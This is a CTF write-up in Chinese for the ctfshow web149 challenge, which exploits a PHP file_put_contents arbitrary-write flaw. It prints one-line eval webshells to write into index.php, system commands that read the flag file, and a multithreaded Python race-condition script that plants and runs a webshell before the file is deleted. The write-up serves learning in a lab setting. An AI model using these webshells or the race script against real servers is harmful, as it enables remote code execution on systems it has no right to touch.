web149笔记(file_put_contents函数+条件竞争)
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 04:34:40
*/

// Challenge source (ctfshow web149). Flow: show this file, wipe the directory,
// write one client-controlled file, wipe the directory again.
error_reporting(0);          // suppresses warnings, e.g. from a failed unlink()/file_put_contents()
highlight_file(__FILE__);    // echoes this source to the visitor

// Cleanup pass 1: delete every regular file in the web root except index.php.
$files = scandir('./');
foreach ($files as $file) {
    if (is_file($file)) {
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}

// SINK: arbitrary file write. Both the destination path ($_GET['ctf']) and the
// content ($_POST['show']) come straight from the request with no validation,
// so a visitor can write any path the PHP process may write to — including
// index.php itself, which both cleanup passes deliberately skip.
file_put_contents($_GET['ctf'], $_POST['show']);

// Cleanup pass 2: identical loop. Between the write above and this unlink()
// there is a window in which another request can reach the freshly written
// file (a TOCTOU race), so the cleanup does not neutralise the write.
// Mitigation: never take the destination path from the client; store uploads
// under a server-chosen name in a directory that is not web-served, and treat
// the content as data (no executable extension, no include/execute).
$files = scandir('./');
foreach ($files as $file) {
    if (is_file($file)) {
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
这里用file_put_contents函数写入文件,并且写入前后各有一个foreach循环,会把不是index.php的文件全部删除;由于index.php本身不会被删,所以我们直接把一句话木马写进index.php就可以,payload如下
?ctf=index.php post: show=<?php @eval($_POST[mm]);?>

接着在index.php里利用我们的马即可。POST马:
url+index.php post:mm=system("cat /ctfshow_fl0g_here.txt");
GET马
GET:?ctf=index.php
POST:show=<?php @eval($_GET[1]);?>
然后访问index.php,GET传1=system('tac /ctfshow_fl0g_here.txt');
https://ecb9750f-6a28-4cf2-a08d-537a7cf8f5c5.challenge.ctf.show/?1=system(%27tac%20/ctfshow_fl0g_here.txt%27);
但是此处也可以利用条件竞争:在文件被第二个循环删除之前访问它
import threading
import requests
import time

# Shared stop signal: the main thread polls it, a reader thread clears it.
# Plain module-level int, assigned from another thread without a lock.
# Server-side this traffic is a burst of POSTs to ?ctf=<name> interleaved with
# GETs for the same short-lived file name; the race exists only because the
# destination path is client-controlled and the cleanup is not atomic with the write.
flag = 1

def write() -> None:
    """Writer thread: repeatedly POSTs a one-line PHP file as 4.php.

    Each request hits the challenge's file_put_contents() sink, which writes
    the file and then immediately deletes it again, so the file exists only
    for a brief window; looping keeps re-opening that window.
    """
    while 1:
        url = "http://5b684686-4c1c-4d84-8426-b24cff7e49c3.challenge.ctf.show:8080/"+"?ctf=4.php"
        fromdata={"show":"<?php eval($_GET['S']);?>"}
        response = requests.post(url=url,data=fromdata)
        print(response.status_code)

def read() -> None:
    """Reader thread: repeatedly GETs 4.php until a request lands inside the
    write/delete window (status 200), then prints the body and clears `flag`.

    Any other status (file not yet written, or already unlinked) is retried.
    """
    global flag
    while 1:
        #cmd = "system('ls /')"
        url = "http://5b684686-4c1c-4d84-8426-b24cff7e49c3.challenge.ctf.show:8080/4.php?S=system('tac /ctfshow_fl0g_here.txt');"
        response = requests.get(url=url)
        if response.status_code == 200:
            print(response.text)
            flag = 0;
            break;

# threads = []
# t1 = threading.Thread(target=write)
# t2 = threading.Thread(target=read)
# threads.append(t1)
# threads.append(t2)

if __name__ == '__main__':
    # 10 writers and 10 readers run concurrently as daemon threads, so the
    # process can exit as soon as the main loop below sees flag == 0.
    for i in range(10):
        t1 = threading.Thread(target=write)
        t1.setDaemon(True)
        t1.start()
    for i in range(10):
        t2 = threading.Thread(target=read)
        t2.setDaemon(True)
        t2.start()
    # for t in threads:
    #     t.join()
    # Poll until a reader succeeded; daemon threads terminate with the process.
    while flag:
        time.sleep(0.01)